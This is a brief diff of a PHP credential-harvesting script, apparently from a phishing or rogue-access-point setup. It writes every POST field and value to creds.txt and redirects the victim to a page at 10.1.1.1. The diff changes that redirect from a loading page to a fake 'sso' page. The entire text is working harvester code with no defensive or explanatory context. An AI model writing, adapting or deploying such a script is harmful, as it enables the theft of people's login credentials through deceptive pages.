|
|
@@ -1,5 +1,5 @@
|
|
|
<?php
|
|
|
-header ('Location:http://10.1.1.1/loading.html');
|
|
|
+header ('Location:http://10.1.1.1/sso.html');
|
|
|
$handle = fopen("creds.txt", "a");
|
|
|
foreach($_POST as $variable => $value) {
|
|
|
fwrite($handle, $variable);
|
|
|
@@ -11,3 +11,4 @@ fwrite($handle, "\r\n");
|
|
|
fclose($handle);
|
|
|
exit;
|
|
|
?>
|
|
|
+
|